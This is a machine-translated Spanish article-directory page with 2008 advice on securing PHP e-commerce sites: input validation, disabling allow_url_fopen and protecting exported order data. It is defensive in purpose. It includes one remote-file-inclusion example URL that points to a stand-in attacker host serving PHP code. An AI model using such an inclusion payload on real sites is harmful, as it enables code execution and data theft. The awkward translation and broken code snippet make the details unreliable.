The following content has been automatically translated by close 
E-Commerce Security - tapar los agujeros de seguridad | Un artículo de comercio electrónico
Artículo Esfera Logo
"" Comercio electrónico "del artículo
Artículo Directory Home Todas las categorías Internet y E-Business Comercio electrónico

E-Commerce Security - tapar los agujeros de seguridad

Por Autor de Expertos: Paul Roberts | Resumen del artículo
Word Count: 520 palabras | Vistas: 153 View (s)
De seguridad en un sitio de comercio electrónico debe ser una consideración importante al desarrollo de un sitio de comercio electrónico o de software. Un programador debe ser consciente de todas las consideraciones de seguridad en el diseño de un sitio. Con el comercio electrónico cada vez más comunes en estos días, el número de ataques a la seguridad es, sin duda cada vez mayor. La paranoia es una cosa saludable para desarrolladores de sitios de e-comercio, tenemos que mantener a la puerta con cuestiones de seguridad, y mantener a nuestros oídos y los ojos abiertos. A pesar de las lagunas siguientes son graves, las lagunas siguiente si está presente se puede arreglar fácilmente.

A continuación se enumeran algunas consideraciones de seguridad que se incluirán en el desarrollo de un sitio. Este artículo no incluye e-robo, por favor, ver mi artículo separado sobre esto.

La entrada del usuario - cada entrada, ya sea entrando en una cantidad, la búsqueda de un producto, entrar en un nombre, etc, debe ser validado por personajes sospechosos. Si esto no se hace, es posible entrar "?>", las etiquetas de cierre de final de PHP y ejecutar código PHP.

Es mucho más seguro permitir que los números y caracteres az (capitales incluidas) y 0-9, y nada más, en lugar de hacer una lista de todo el carácter que no debería estar allí. La secuencia de comandos de validación de las necesidades para desplazarse a través de cada personaje uno por uno. Esto debe lograrse mediante la validación del lado del servidor, no Javascript. Con el lado de servidor de validación de entrada es esencial para mantener fuera caracteres no deseados

Existe otra importante cuando la ejecución de código PHP. Cuando se usa PHP es un escenario llamado allow_url_fopen que permite la apertura de archivos desde un script PHP. Este valor debe estar apagado, a menos que sea absolutamente necesario.

Imagínese usted tiene scripts PHP para los encabezados y pies de página fija, y para acceder a sus páginas web que escribiría en http://www.mysite.com/index.php?page=page2. Todo lo que necesita es un usuario malintencionado ejecutar un script mediante la modificación de estos parámetros, escribiendo "http:// www.mysite.com/index.php?page=http://www.evilhack.com/hacker.txt" con la algo de código PHP en el archivo "hacker.txt". Usted podría tener nada suceda, archivos PHP leer, borrar, información vital robados.

Si usted no está seguro de si esta opción está activada o desactivada, por favor copie el siguiente código PHP en un archivo de texto, y subirlo a tu servidor web:

phpinfo ();
?>

Cuando tiene acceso a la secuencia de comandos en su servidor web, debe venir a través del establecimiento de allow_url_fopen en la configuración.

Un usuario de la computadora, en circunstancias normales no puede encontrar el valor de esta configuración.

Tenga cuidado con los datos exportados, como pedidos, productos en CSV y mySQL. Si estos datos se exporta desde un script y se mantiene en el servidor web bajo un común, es decir el nombre de archivo. http://www.mysite.com/admin/output_tables.csv. Realmente esto es sólo un problema cuando los datos exportados reside en un archivo en un directorio que es accesible al público. Hay dos maneras de prevenir esta laguna en la seguridad - En primer lugar tiene el archivo de salida detrás de un directorio protegido con contraseña, en segundo lugar tenemos los datos ubicados dentro de un formulario elemento de área de texto HTML en un script. El dueño de la tienda continuación, puede copiar esta información del archivo de texto y crear un nuevo archivo en su ordenador y pegar la información aquí.

Todo lo que necesita es un hacker para encontrar este nombre de archivo al revisar el sitio de e-demo del software de comercio y buscar el mismo nombre de archivo en un sitio real.
Paul Roberts

Sobre el autor / Autor Bio

Paul Roberts
Dirijo una empresa de desarrollo de software especializada en E-Commerce, Search Engine Optimization, impresión y software de estimación de llamada ROBO Design Solutions. También desarrollan Nueva Zelanda E-Commerce Solutions y software bajo el nombre de ROBO Diseño.

Article Source: http://www.sw.articlesphere.com/Article/E-Commerce-Security---Plugging-the-Security-Holes/145459

Article Tags: e-commerce, ecommerce, security, loophole, loopholes, plugging, secure, validation

Article Submitted: 2008-06-05 | This Article has been viewed 153 times.

Rate Article

Related Videos

Play Video
How to Strengthen Network Security with Cisco Network Manager
Play Video
Understanding your Home Network Router #5 - Secure Your Network with WPA2
Play Video
Learn About Secure Computing
Play Video
¿Cómo mantener el equipo protegido
Play Video
Cómo comprobar la configuración de seguridad en Windows Vista

"Más de comercio electrónico" Artículos Relacionados

A continuación se mencionan más artículos relacionados con el artículo anterior de la categoría "Comercio Electrónico" del artículo.

Las personas interesadas en el artículo anterior "E-Commerce Security - tapar los agujeros de seguridad" también están interesados en los artículos relacionados que figuran a continuación:

Ejecución de una empresa de comercio electrónico no es sólo de mantener su sitio web en funcionamiento. Los clientes confían en su capacidad de servir a ellos a través de teléfono, fax, correo electrónico u otros medios, y requiere de todos sus sistemas de estar trabajando para poder cumplir las peticiones del cliente.
Sólo un par de días atrás yo estaba teniendo una charla con mi amigo. Se estaba celebrando el 1 de su bebé de cumpleaños y tuvo que correr entre su país natal, en Kerala y Chennai, su lugar de trabajo. Él y su mejor medio recorrido entre estos lugares por lo menos 4 veces en el último mes.
Si usted ha estado haciendo comercio electrónico para cualquier cantidad de tiempo, se habría enterado de que hay más de scamers de efectivo de los proveedores de servicios de directorio al por mayor nave. En el mundo de los negocios electrónicos, SaleHoo y marcas a nivel mundial son los proveedores de servicios de reputación que han ganado popularidad en los últimos años.
Si alguna vez ha sido un minorista en línea, probablemente ya han oído hablar de SaleHoo o incluso lo utilizó para su ventaja. Si usted está recién empezando con su negocio, usted podría ser confundido con el SaleHoo mixto de evaluación que hay. Ahora, echemos un vistazo a lo que SaleHoo que realmente es y los servicios que ofrecen lo que muchos tienden a pasar por alto.
¿Cuánta gente sabe que han comprado algo en Internet? Si tu como yo, muy pocos, es por eso que el comercio electrónico es nueva en el mundo un centro comercial en línea. Pero, ¿quién dirige estas tiendas al por menor en línea? Personas como usted y yo, por eso este negocio está creciendo y continuará creciendo ahora y en el futuro.
Si usted es un gran fan de los últimos productos de electrónica, usted puede ser tentado por la idea de llevar su propia línea de negocio de la electrónica. No es tan difícil para empezar cuando usted toma la ventaja completa de la caída de derecho marítimo de servicios electrónicos y hay un montón para que usted pueda elegir.
¿Alguna vez en su tienda local y me pregunto qué sería como si de propiedad de ella? ¿Quieres ser dueño de una buena voluntad de la gente como tú? Bueno este artículo te mostrará los beneficios de ser dueño de su propia tienda en línea, o comúnmente conocido como el comercio electrónico que difiere de una tienda de conveniencia real local.
Artículo Directory Home Todas las categorías Internet y E-Business Comercio electrónico

¿No puede encontrar lo que estás buscando? Prueba Google Search!
(Le servimos en todo el mundo - Lugares actualizada al Miércoles, 16 de diciembre 2009 03:36 am, Singapur)
Estados Unidos de América, EE.UU.. Reino Unido, Reino Unido (Inglaterra, Escocia, Gales, Irlanda del Norte). Canadá. Afganistán. Albania. Argelia. Samoa Americana. Andorra. Angola. Anguila. La Antártida. Antigua y Barbuda. Argentina. Armenia. Aruba. Australia. Austria. Azerbaiyán. Bahamas. Bahrein. Bangladesh. Barbados. Belarús. Bélgica. Belice. Benin. Bermudas. Bhután. Bolivia. Bonaire. Bosnia-Herzegovina. Botswana. Brasil. Islas Vírgenes Británicas. Brunei Darussalam. Bulgaria. Burkina Faso. Burundi. Camboya. Camerún. Cabo Verde. Islas Caimán. La República Centroafricana. Chad. Islas del Canal. Chile. Porcelana. Isla de Navidad. Colombia. Comoras. Congo. Congo (Rep. Dem.). Islas Cook. Costa Rica. Côte d'Ivoire. Croacia. Cuba. Curazao. Chipre. República Checa. Dinamarca. Djibouti. Dominica. República Dominicana. Timor Oriental. Ecuador. Egipto. El Salvador. Guinea Ecuatorial. Eritrea. Estonia. Etiopía. Islas Malvinas y dependencias. Islas Feroe. Fiji. Finlandia. Francia. Francés de Guayana. Francés Polinesia. Gabón. Gambia. De Gaza. Georgia. Alemania. Ghana. Gibraltar. Grecia. Groenlandia. Granada. Guadalupe. Guam. Guatemala. Guinea. Guinea-Bissau. Guyana. Haití. Islas Hawaianas. Honduras. Hong Kong. Hungría. Islandia. India. Indonesia. Irán. Irak. Isla de Man. Israel. Italia. Costa de Marfil. Jamaica. Japón. Atolón de Johnston. Jordania. Kazajstán. Kenya. Kiribati. Corea (Norte). Corea (del Sur). Kuwait. Kirguistán. Laos. Letonia. Líbano. Islas de Sotavento. Lesotho. Liberia. Libia. Liechtenstein. Lituania. Luxemburgo. Macao. Macedonia. Madagascar. Malawi. Malasia. Maldivas. Malí. Malta. Islas Marshall. Martinica. Mauritania. Mauricio. México. Micronesia (Estados Federados). Islas Midway. Moldova. Mónaco. Mongolia. Montserrat. Marruecos. Mosquito Coast. Mozambique. Myanmar (Birmania). Namibia. Nauru. Navassa Island. Nepal. Países Bajos. Antillas Neerlandesas. Nueva Caledonia. Nueva Zelanda. Nicaragua. Níger. Nigeria. Niue. Isla de Norfolk. Islas Marianas del Norte. Noruega. Omán. Pakistán. Palau. Palestina. Panamá. Papua Nueva Guinea. Islas Paracel. Paraguay. Perú. Filipinas. Islas Pitcairn. Polonia. Portugal. Puerto Rico. Qatar. Reunión. Rumania. Rusia. Rwanda. Islas Ryukyu. Santa Elena. Saint Kitts y Nevis. Santa Lucía. Saint Pierre y Miquelón. San Vicente y las Granadinas. Samoa. San Marino. Santo Tomé y Príncipe. Arabia Saudita. Senegal. Serbia. Seychelles. Sierra Leona. Singapur. Eslovaquia. Eslovenia. Islas Salomón. Somalia. Sudáfrica. España. Sri Lanka. Sudán. Suriname. Swazilandia. Suecia. Suiza. Siria. Taiwan. Tayikistán. Tanzania. Tailandia. Togo. Tonga. Transkei. Trinidad y Tobago. Túnez. Turquía. Turkmenistán. Islas Turcas y Caicos. Tuvalu. Islas Vírgenes de EE.UU.. Uganda. Ucrania. Emiratos Árabes Unidos. Volta Superior. Uruguay. Uzbekistán. Vanuatu. Ciudad del Vaticano (Santa Sede). Venezuela. Vietnam. Isla de Wake. Islas de Barlovento. Yemen. Yugoslavia. Zaire. Zambia. Zimbabwe
Copyright © 2005 -- por Larry Lim, Singapur - artículo Directorio de buscadores en ArticleSphere.com ™
Todos los Derechos Reservados. Todas las marcas y de sericios son propiedad de sus respectivos propietarios.

Afrikaans Albania Árabe Belarús Búlgaro Catalán Chino (simplificado) Chino (tradicional) Croacia Checa Danés Alemán Inglés Estonia Filipino Finlandés Francés Galicia Griego Hebreo Hindi Húngaro Islandia Indonesia Irlanda Italiano Japonés Corea Letonia Lituano Macedonia Malayo Malta Neerlandés Noruega Persa Polaco Portugués Rumano Rusia Serbia Eslovaca Eslovenia Español Swahili Sueco Tailandia Turquía Ucrania Vietnamita Galés Yiddish